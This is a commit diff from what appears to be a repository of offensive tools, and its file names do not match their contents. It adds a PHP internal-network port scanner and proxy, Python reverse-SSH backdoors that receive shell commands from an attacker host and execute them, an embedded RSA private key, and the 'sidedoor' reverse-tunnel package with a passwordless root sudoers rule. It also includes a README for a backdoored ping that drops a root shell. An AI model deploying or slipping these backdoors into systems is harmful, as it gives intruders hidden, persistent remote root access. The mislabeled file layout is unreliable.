update

Author: xl7dev

Aspx/hec.aspx

@@ -0,0 +1,137 @@
+<?php
+ 
+set_time_limit(0);//设置程序执行时间
+ob_implicit_flush(True);
+ob_end_flush();
+$url = isset($_REQUEST['url'])?$_REQUEST['url']:null; 
+
+/*端口扫描代码*/
+function check_port($ip,$port,$timeout=0.1) {
+ $conn = @fsockopen($ip, $port, $errno, $errstr, $timeout);
+ if ($conn) {
+ fclose($conn);
+ return true;
+ }
+}
+
+ 
+function scanip($ip,$timeout,$portarr){
+foreach($portarr as $port){
+if(check_port($ip,$port,$timeout=0.1)==True){
+echo 'Port: '.$port.' is open<br/>';
+@ob_flush();
+@flush();
+ 
+}
+ 
+}
+}
+
+echo '<html>
+<form action="" method="post">
+<input type="text" name="startip" value="Start IP" />
+<input type="text" name="endip" value="End IP" />
+<input type="text" name="port" value="80,8080,8888,1433,3306" />
+Timeout<input type="text" name="timeout" value="10" /><br/>
+<button type="submit" name="submit">Scan</button>
+</form>
+</html>
+';
+
+if(isset($_POST['startip'])&&isset($_POST['endip'])&&isset($_POST['port'])&&isset($_POST['timeout'])){
+    
+$startip=$_POST['startip'];
+$endip=$_POST['endip'];
+$timeout=$_POST['timeout'];
+$port=$_POST['port'];
+$portarr=explode(',',$port);
+$siparr=explode('.',$startip);
+$eiparr=explode('.',$endip);
+$ciparr=$siparr;
+if(count($ciparr)!=4||$siparr[0]!=$eiparr[0]||$siparr[1]!=$eiparr[1]){
+exit('IP error: Wrong IP address or Trying to scan class A address');
+}
+if($startip==$endip){
+echo 'Scanning IP '.$startip.'<br/>';
+@ob_flush();
+@flush();
+scanip($startip,$timeout,$portarr);
+@ob_flush();
+@flush();
+exit();
+}
+ 
+if($eiparr[3]!=255){
+$eiparr[3]+=1;
+}
+while($ciparr!=$eiparr){
+$ip=$ciparr[0].'.'.$ciparr[1].'.'.$ciparr[2].'.'.$ciparr[3];
+echo '<br/>Scanning IP '.$ip.'<br/>';
+@ob_flush();
+@flush();
+scanip($ip,$timeout,$portarr);
+$ciparr[3]+=1;
+ 
+if($ciparr[3]>255){
+$ciparr[2]+=1;
+$ciparr[3]=0;
+}
+if($ciparr[2]>255){
+$ciparr[1]+=1;
+$ciparr[2]=0;
+}
+}
+}
+
+/*内网代理代码*/
+
+function getHtmlContext($url){ 
+    $ch = curl_init(); 
+    curl_setopt($ch, CURLOPT_URL, $url); 
+    curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header 
+    curl_setopt($ch, CURLOPT_NOBODY, FALSE); //表示需要response body 
+    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); 
+    curl_setopt($ch, CURLOPT_TIMEOUT, 120); 
+    $result = curl_exec($ch); 
+  global $header; 
+  if($result){ 
+       $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE); 
+       $header = explode("\r\n",substr($result, 0, $headerSize)); 
+       $body = substr($result, $headerSize); 
+  } 
+    if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == '200') { 
+        return $body; 
+    } 
+    if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == '302') { 
+    $location = getHeader("Location"); 
+    if(strpos(getHeader("Location"),'http://') == false){ 
+      $location = getHost($url).$location; 
+    } 
+        return getHtmlContext($location); 
+    } 
+    return NULL; 
+} 
+
+function getHost($url){ 
+    preg_match("/^(http:\/\/)?([^\/]+)/i",$url, $matches); 
+    return $matches[0]; 
+} 
+function getCss($host,$html){ 
+    preg_match_all("/<link[\s\S]*?href=['\"](.*?[.]css.*?)[\"'][\s\S]*?>/i",$html, $matches); 
+    foreach($matches[1] as $v){ 
+    $cssurl = $v; 
+        if(strpos($v,'http://') == false){ 
+      $cssurl = $host."/".$v; 
+    } 
+    $csshtml = "<style>".file_get_contents($cssurl)."</style>"; 
+    $html .= $csshtml; 
+  } 
+  return $html; 
+} 
+
+if($url != null){ 
+
+    $host = getHost($url); 
+    echo getCss($host,getHtmlContext($url)); 
+}
+?>

Php/scanner.php

@@ -0,0 +1,3 @@
+This is derived from InfosecInstitute.
+Requires Paramiko Lib at both Ends. 
+More Information Here: http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/

SSH/ReverseSSH-Backdoor/Readme.txt

@@ -0,0 +1,17 @@
+import paramiko
+import threading
+import subprocess
+
+client = paramiko.SSHClient()
+client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+client.connect('*insertServerIPHere*', username='root', password='toor')
+chan = client.get_transport().open_session()
+chan.send('Hey i am connected :) ')
+print chan.recv(1024)
+command = chan.recv(1024)
+try:
+	CMD = subprocess.check_output(command, shell=True)
+        chan.send(CMD)
+except Exception,e:
+        chan.send(str(e))
+client.close

SSH/ReverseSSH-Backdoor/revsshclient.py

@@ -0,0 +1,60 @@
+import socket
+import paramiko
+import threading
+import sys
+
+host_key = paramiko.RSAKey(filename='/usr/share/doc/python-paramiko/examples/test_rsa.key')
+
+class Server (paramiko.ServerInterface):
+   def _init_(self):
+       self.event = threading.Event()
+   def check_channel_request(self, kind, chanid):
+       if kind == 'session':
+           return paramiko.OPEN_SUCCEEDED
+       return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
+   def check_auth_password(self, username, password):
+       if (username == 'root') and (password == 'toor'):
+           return paramiko.AUTH_SUCCESSFUL
+       return paramiko.AUTH_FAILED
+
+try:
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    sock.bind(('*insertClientIPHere*', 22))
+    sock.listen(100)
+    print '[+] Listening for connection ...'
+    client, addr = sock.accept()
+except Exception, e:
+    print '[-] Listen/bind/accept failed: ' + str(e)
+    sys.exit(1)
+print '[+] Got a connection!'
+
+try:
+    t = paramiko.Transport(client)
+    try:
+        t.load_server_moduli()
+    except:
+        print '[-] (Failed to load moduli -- gex will be unsupported.)'
+        raise
+    t.add_server_key(host_key)
+    server = Server()
+    try:
+        t.start_server(server=server)
+    except paramiko.SSHException, x:
+        print '[-] SSH negotiation failed.'
+
+    chan = t.accept(20)
+    print '[+] Authenticated!'
+    print chan.recv(1024)
+    chan.send('Yeah i can see this')
+    command= raw_input("Enter command: ").strip('\n')
+    chan.send(command)
+    print chan.recv(1024) + '\n'
+
+except Exception, e:
+    print '[-] Caught exception: '': ' + str(e)
+    try:
+        t.close()
+    except:
+        pass
+    sys.exit(1)

SSH/ReverseSSH-Backdoor/revsshserver.py

@@ -0,0 +1,5 @@
+SSH Backdoor using Paramiko
+
+Example:
+
+![](print.png)

SSH/custom-ssh-backdoor/README.md

@@ -0,0 +1,18 @@
+import paramiko
+import threading
+import subprocess
+
+client = paramiko.SSHClient()
+client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+client.connect('192.168.1.100', username='joridos', password='olh234')
+chan = client.get_transport().open_session()
+chan.send('Hey i am connected :) ')
+while True:
+    command = chan.recv(1024)
+    try:
+        CMD = subprocess.check_output(command, shell=True)
+        chan.send(CMD)
+    except Exception,e:
+        chan.send(str(e))
+print chan.recv(1024)
+client.close

SSH/custom-ssh-backdoor/client.py

@@ -0,0 +1,60 @@
+import socket
+import paramiko
+import threading
+import sys
+
+host_key = paramiko.RSAKey(filename='/home/joridos/custom-ssh-backdoor/test_rsa.key')
+
+class Server (paramiko.ServerInterface):
+   def _init_(self):
+       self.event = threading.Event()
+   def check_channel_request(self, kind, chanid):
+       if kind == 'session':
+           return paramiko.OPEN_SUCCEEDED
+       return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
+   def check_auth_password(self, username, password):
+       if (username == 'joridos') and (password == 'olh234'):
+           return paramiko.AUTH_SUCCESSFUL
+       return paramiko.AUTH_FAILED
+
+try:
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
+    sock.bind(('192.168.1.100', 22))
+    sock.listen(100)
+    print '[+] Listening for connection ...'
+    client, addr = sock.accept()
+except Exception, e:
+    print '[-] Listen/bind/accept failed: ' + str(e)
+    sys.exit(1)
+print '[+] Got a connection!'
+
+try:
+    t = paramiko.Transport(client)
+    try:
+        t.load_server_moduli()
+    except:
+        print '[-] (Failed to load moduli -- gex will be unsupported.)'
+        raise
+    t.add_server_key(host_key)
+    server = Server()
+    try:
+        t.start_server(server=server)
+    except paramiko.SSHException, x:
+        print '[-] SSH negotiation failed.'
+
+    chan = t.accept(20)
+    print '[+] Authenticated!'
+    print chan.recv(1024)
+    while True:
+        command= raw_input("Enter command: ").strip('n')
+        chan.send(command)
+        print chan.recv(1024) + 'n'
+
+except Exception, e:
+    print '[-] Caught exception: ' + str(e) + ': ' + str(e)
+    try:
+        t.close()
+    except:
+        pass
+    sys.exit(1)

SSH/custom-ssh-backdoor/print.png

@@ -0,0 +1,15 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIICWgIBAAKBgQDTj1bqB4WmayWNPB+8jVSYpZYk80Ujvj680pOTh2bORBjbIAyz
+oWGW+GUjzKxTiiPvVmxFgx5wdsFvF03v34lEVVhMpouqPAYQ15N37K/ir5XY+9m/
+d8ufMCkjeXsQkKqFbAlQcnWMCRnOoPHS3I4vi6hmnDDeeYTSRvfLbW0fhwIBIwKB
+gBIiOqZYaoqbeD9OS9z2K9KR2atlTxGxOJPXiP4ESqP3NVScWNwyZ3NXHpyrJLa0
+EbVtzsQhLn6rF+TzXnOlcipFvjsem3iYzCpuChfGQ6SovTcOjHV9z+hnpXvQ/fon
+soVRZY65wKnF7IAoUwTmJS9opqgrN6kRgCd3DASAMd1bAkEA96SBVWFt/fJBNJ9H
+tYnBKZGw0VeHOYmVYbvMSstssn8un+pQpUm9vlG/bp7Oxd/m+b9KWEh2xPfv6zqU
+avNwHwJBANqzGZa/EpzF4J8pGti7oIAPUIDGMtfIcmqNXVMckrmzQ2vTfqtkEZsA
+4rE1IERRyiJQx6EJsz21wJmGV9WJQ5kCQQDwkS0uXqVdFzgHO6S++tjmjYcxwr3g
+H0CoFYSgbddOT6miqRskOQF3DZVkJT3kyuBgU2zKygz52ukQZMqxCb1fAkASvuTv
+qfpH87Qq5kQhNKdbbwbmd2NxlNabazPijWuphGTdW0VfJdWfklyS2Kr+iqrs/5wV
+HhathJt636Eg7oIjAkA8ht3MQ+XSl9yIJIS8gVpbPxSw5OMfw0PjVE7tBdQruiSc
+nvuQES5C9BMHjF39LZiGH1iLQy7FgdHyoP+eodI7
+-----END RSA PRIVATE KEY-----

SSH/custom-ssh-backdoor/server.py

@@ -0,0 +1,81 @@
+# sidedoor
+
+sidedoor maintains a reverse tunnel to provide a backdoor.
+sidedoor can be used to remotely control a device behind a NAT.
+
+sidedoor is packaged for Debian-based systems with systemd or upstart.
+It has been used on Debian 8 (jessie) and Ubuntu 14.04 LTS (trusty).
+
+The sidedoor user has full root access configured in /etc/sudoers.d.
+
+## Installation
+
+If sidedoor is in your package repositories, simply install it, e.g.,
+`sudo apt-get install sidedoor`.
+
+Otherwise, you will need to build a Debian package and install it.
+First, install build dependencies.
+
+    sudo apt-get install debhelper dh-systemd
+
+Then, from the directory containing this README file, build and install
+a package.
+
+    rm -f ../sidedoor*.deb # remove old package builds
+    dpkg-buildpackage -us -uc -b
+    sudo dpkg -i ../sidedoor*.deb
+
+## Configuration
+
+The remote server and tunnel port are configured in `/etc/default/sidedoor`.
+SSH configuration files are located in the `/etc/sidedoor` directory.
+`~sidedoor/.ssh` is a symlink to `/etc/sidedoor`.
+
+ * Configure `REMOTE_SERVER` and `TUNNEL_PORT` in `/etc/default/sidedoor`.
+ * Create SSH configuration files under `/etc/sidedoor`.
+   - `authorized_keys`:  SSH public key(s) to control access to the local
+     sidedoor user.
+   - `id_rsa`: SSH private key to access the remote server.
+     Can be generated with `sudo ssh-keygen -t rsa -f /etc/sidedoor/id_rsa`
+     (press enter when prompted for passphrase to leave empty).
+     Needs read permission by the sidedoor user or group, e.g.,
+     `sudo chown root:sidedoor /etc/sidedoor/id_rsa` and
+     `sudo chmod 640 /etc/sidedoor/id_rsa`.
+     The corresponding public key `id_rsa.pub` will need to be included in
+     the remote user's `~/.ssh/authorized_keys` file.
+   - `known_hosts`: SSH host key of the remote server.
+   - `config` (optional): Additional SSH config, see `man ssh_config`.
+
+Restart the sidedoor service to apply changes.
+
+    sudo service sidedoor restart
+
+## Recommendations
+
+ * Lock down the local SSH server by editing `/etc/ssh/sshd_config`.
+   - Disable password authentication
+     (`ChallengeResponseAuthentication no` and `PasswordAuthentication no`).
+   - Limit daemon to only listen on localhost.
+     (`ListenAddress ::1` and `ListenAddress 127.0.0.1`).
+   - To apply changes, restart or reload sshd, e.g.,
+     `sudo service ssh reload`.
+ * Modify the `ssh_client_config_example` file and include it in a client's
+   `~/.ssh/config` file to easily access the tunneled backdoor
+   with `ssh`, `scp`, `rsync`, etc.
+
+## License
+
+Copyright 2015 Dara Adib.
+
+This program is free software: you can redistribute it and/or modify
+it under the terms of the GNU General Public License as published by
+the Free Software Foundation, either version 3 of the License, or
+(at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program.  If not, see <http://www.gnu.org/licenses/>.

SSH/custom-ssh-backdoor/test_rsa.key

@@ -0,0 +1,18 @@
+Host *
+  # Tunneled traffic (e.g., SSH) is encrypted and thus not compressible.
+  Compression no
+
+  # Disable password authentication.
+  BatchMode yes
+
+  # Terminate if unable to set up port forwarding.
+  ExitOnForwardFailure yes
+
+  # Enable SSH keepalives.
+  ServerAliveInterval 30
+
+  # Disconnect after unresponsive SSH keepalives.
+  ServerAliveCountMax 2
+
+  # Enable TCP keepalives.
+  TCPKeepAlive yes

SSH/sidedoor/COPYING

@@ -0,0 +1,5 @@
+sidedoor (0.1) UNRELEASED; urgency=low
+
+  * Initial Release.
+
+ -- Dara Adib <daradib@ocf.berkeley.edu>  Thu, 31 Dec 2015 16:35:12 -0500

SSH/sidedoor/README.md

@@ -0,0 +1 @@
+9

SSH/sidedoor/config

@@ -0,0 +1,23 @@
+Source: sidedoor
+Section: net
+Priority: optional
+Maintainer: Dara Adib <daradib@ocf.berkeley.edu>
+Build-Depends: debhelper (>= 9), dh-systemd
+Standards-Version: 3.9.6
+Homepage: https://github.com/daradib/sidedoor
+Vcs-Git: https://github.com/daradib/sidedoor.git
+Vcs-Browser: https://github.com/daradib/sidedoor
+
+Package: sidedoor
+Architecture: all
+Depends: ${misc:Depends}, adduser, systemd | upstart, autossh
+Recommends: openssh-server
+Description: Backdoor using a reverse tunnel
+ sidedoor maintains a reverse tunnel to provide a backdoor.
+ sidedoor can be used to remotely control a device behind a NAT.
+ .
+ To use, set up SSH keys to
+ (1) access a remote server, and,
+ (2) if tunneling SSH, control access to the local sidedoor user.
+ .
+ The sidedoor user has full root access configured in /etc/sudoers.d.

SSH/sidedoor/debian/changelog

@@ -0,0 +1,24 @@
+Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
+Upstream-Name: sidedoor
+Source: https://github.com/daradib/sachesi
+
+Files: *
+Copyright: 2015 Dara Adib <daradib@ocf.berkeley.edu>
+License: GPL-3.0+
+
+License: GPL-3.0+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+ .
+ This package is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ GNU General Public License for more details.
+ .
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see <http://www.gnu.org/licenses/>.
+ .
+ On Debian systems, the complete text of the GNU General
+ Public License version 3 can be found in "/usr/share/common-licenses/GPL-3".

SSH/sidedoor/debian/compat

@@ -0,0 +1,4 @@
+#!/usr/bin/make -f
+
+%:
+	dh $@ --with systemd

SSH/sidedoor/debian/control

@@ -0,0 +1,11 @@
+# Configuration for sidedoor service
+
+# Remote SSH server to connect to, i.e., [user@]hostname.
+REMOTE_SERVER=
+
+# Port on the remote server to tunnel to local port.
+TUNNEL_PORT=
+
+# Local port to provide access to.
+# If unset, looks for port in /etc/ssh/sshd_config.
+#LOCAL_PORT=22

SSH/sidedoor/debian/copyright

@@ -0,0 +1,2 @@
+etc/sidedoor
+var/lib/sidedoor

SSH/sidedoor/debian/rules

@@ -0,0 +1 @@
+README.md

SSH/sidedoor/debian/sidedoor.default

@@ -0,0 +1,3 @@
+config    etc/sidedoor
+sudoers   etc/sudoers.d
+sidedoor  usr/bin

SSH/sidedoor/debian/sidedoor.dirs

@@ -0,0 +1 @@
+etc/sidedoor var/lib/sidedoor/.ssh

SSH/sidedoor/debian/sidedoor.docs

@@ -0,0 +1,13 @@
+#!/bin/sh
+
+set -e
+
+if [ "$1" = configure ]; then
+  adduser --quiet --system --no-create-home --group \
+    --home /var/lib/sidedoor \
+    --shell /bin/sh \
+    sidedoor
+  passwd --quiet --lock sidedoor
+fi
+
+#DEBHELPER#

SSH/sidedoor/debian/sidedoor.install

@@ -0,0 +1,14 @@
+#!/bin/sh
+
+set -e
+
+#DEBHELPER#
+
+if [ "$1" = remove ]; then
+  rm -f /etc/sudoers.d/sidedoor
+fi
+
+if [ "$1" = purge ]; then
+  deluser --quiet --system sidedoor || true
+  rm -rf /var/lib/sidedoor
+fi

SSH/sidedoor/debian/sidedoor.links

@@ -0,0 +1,12 @@
+[Unit]
+Description=maintain reverse tunnel
+After=local-fs.target network.target
+
+[Service]
+User=sidedoor
+EnvironmentFile=-/etc/default/sidedoor
+ExecStart=/usr/bin/sidedoor "$REMOTE_SERVER" "$TUNNEL_PORT" "$LOCAL_PORT"
+Restart=on-failure
+
+[Install]
+WantedBy=multi-user.target

SSH/sidedoor/debian/sidedoor.postinst

@@ -0,0 +1,12 @@
+description "maintain reverse tunnel"
+
+start on (local-filesystems and net-device-up IFACE!=lo)
+
+respawn
+
+setuid sidedoor
+
+script
+    [ -f /etc/default/sidedoor ] && . /etc/default/sidedoor
+    exec /usr/bin/sidedoor "$REMOTE_SERVER" "$TUNNEL_PORT" "$LOCAL_PORT"
+end script

SSH/sidedoor/debian/sidedoor.postrm

@@ -0,0 +1 @@
+3.0 (native)

SSH/sidedoor/debian/sidedoor.service

@@ -0,0 +1,18 @@
+#!/bin/sh
+
+set -eu
+
+if [ $# -ne 2 -a $# -ne 3 ]; then
+  echo "Usage: $(basename $0) REMOTE_SERVER TUNNEL_PORT [LOCAL_PORT]"
+  echo
+  echo "Maintain a reverse SSH tunnel."
+  exit 65
+fi
+
+REMOTE_SERVER="$1"
+TUNNEL_PORT="$2"
+LOCAL_PORT="${3:-$(awk '/^Port/ {print $2}' /etc/ssh/sshd_config)}"
+
+exec autossh -M 0 -NT \
+  -R "${TUNNEL_PORT}:localhost:${LOCAL_PORT}" \
+  "$REMOTE_SERVER"

SSH/sidedoor/debian/sidedoor.upstart

@@ -0,0 +1,4 @@
+Host MY_HOSTNAME
+    User sidedoor
+    #IdentityFile # Optionally specify a different private key.
+    ProxyCommand ssh REMOTE_SERVER nc localhost TUNNEL_PORT

SSH/sidedoor/debian/source/format

@@ -0,0 +1 @@
+sidedoor ALL=(ALL) NOPASSWD: ALL

SSH/sidedoor/sidedoor

@@ -0,0 +1,97 @@
+# zf0 anti-copyright pledge, from zf0's third zine
+
+    -- Introducing ZAP --
+    
+    Have you ever been in a situation where you based your code
+    off of another script, yet you didn't want to include its
+    accompanying copyright notice? Then this is for you.
+    
+    In this case, you have three options:
+    
+      a) Include the notice, because you are lazy and legal.
+      b) Rewrite your program from scratch, because you want
+         your due creative recognition.
+      c) Simply not include the copyright notice.
+    
+    These are also known as:
+    
+      a) The lame way.
+      b) The ego way.
+      c) The elite way!
+    
+    There are various reasons for choosing c. Perhaps you find
+    that if you were to start your code fresh, it would be
+    similar in expressions and control to the code you had
+    before. Further, they would probably do the same thing in
+    almost the same way. Doing so does not seem fair to you.
+    
+    Additionally, by including the GPL in your modified program
+    you have essentially waved moral rights to the code. You
+    have signed the code over, so to speak, and have willingly
+    withdrawn your rights to it.
+    
+    You might feel a bit ripped off. Afterall, perhaps your
+    code is a greater derivation, in both form and concept,
+    from your source than that source is from its influences.
+    
+    A more practical reason exists: Perhaps you hate long,
+    annoying comments from others in your tool, and heck, you
+    are an evil hacker who isn't going to let copyright law
+    alter your practices.
+    
+    The GPL is one example of a copyleft notice that seeks to
+    limit some freedoms to ensure most freedoms. As nice as the
+    GPL is, for any of the reasons above you may not wish to
+    abide by its rules. The GPL is not full of loopholes:
+    rather, every new version is like the next Terminator, only
+    stronger. It's out to get you and you cannot stop it. I
+    knocked a copy of the GPLv2 into molten steel; it came out
+    squeaky clean.
+    
+    If you decide to basically violate the law and not include
+    a copyright license, you may wish to offer some explanation
+    for that choice. Thus, we present ZAP.
+
+    -----------------------------------------------------------
+    |                                                         |
+    |            ZF0 Anti-copyright Pledge (ZAP)              |
+    |                                                         |
+    |                                                         |
+    | 1. This code may or may not be derived                  |
+    |    from one or multiple external sources                |
+    |    with or without express permission.                  |
+    |                                                         |
+    |                                                         |
+    | 2. We reject the general universal applicability        |
+    |    of software copyrights to all cases based on         |
+    |    any combination of the following:                    |
+    |                                                         |
+    |     a) The vagueness of the Agreement on Trade          |
+    |        -Related Aspects of Intellectual Property        |
+    |        Rights in the area of software rights.           |
+    |     b) The lack of cohesion of different                |
+    |        national copyright legislation.                  |
+    |     c) The lack of originality in software and          |
+    |        the lack of establishment of originality.        |
+    |     d) Further personal opinions.                       |
+    |                                                         |
+    |                                                         |
+    | 3. We reject the assumed right of verbatim              |
+    |    copyright control over all revision.                 |
+    |                                                         |
+    |     a) Particularly in free software, a copyright       |
+    |        serves as recognition and little else.           |
+    |     b) We will extend recognition as we                 |
+    |        feel it is deserved, and not less.               |
+    |                                                         |
+    |                                                         |
+    | 4. This statement does not attempt to                   |
+    |    serve as a legally binding document.                 |
+    |                                                         |
+    |     a) This notice is an explanation, not a limitation. |
+    |     b) These are terms of release,                      |
+    |        not conditions of use                            |
+    |     c) This software is thus provided as-is             |
+    |        without any guarantees or warranties.            |
+    |                                                         |
+    -----------------------------------------------------------

SSH/sidedoor/ssh_client_config_example

@@ -0,0 +1,30 @@
+OS X Backdoored ping
+====================
+
+This is just the normal OS X `ping`, but if you run it with the flag `-X`, it drops a root shell.  This relies on the `suid` bit being set, it's not an exploit and it won't help you root a server (which you shouldn't be doing anyway 😠).
+
+I didn't write the `ping` utility, this is just the normal OS X `ping`, the source code of which can be found [here](http://www.opensource.apple.com/source/network_cmds/network_cmds-329.2/ping.tproj/ping.c?txt). All I did was add the `-X` flag and the function `r00t()`.
+
+This program still works like the normal `ping`. It just has a little secret 😉
+
+# Compilation & Installation
+
+1. `wget https://raw.githubusercontent.com/raincoats/osx-ping-backdoor/master/ping.c`
+1. `gcc ping.c -o ping`
+2. `chown root:wheel ./ping; chmod 4755 ./ping`
+3. Optionally, `mv /sbin/ping{,-backup} && mv ./ping /sbin` (but I mean, really, are you sure you want a backdoor on your smackbook throw?)
+
+# Usage
+
+    $ ./ping -X
+       .----------------.
+       |_I_I_I_I_I_I_I_I]___
+       |  _    r00t! : ; _  )
+      ='-(_)----------=-(_)-'
+    sh-3.2# whoami
+    root
+    sh-3.2#
+
+# Why did you even bother
+
+This is me attempting to learn a little C. Even though I didn't do much, I'm stoked that it compiles & works. So if you don't like it buzz off 🐝🐝🐝🐝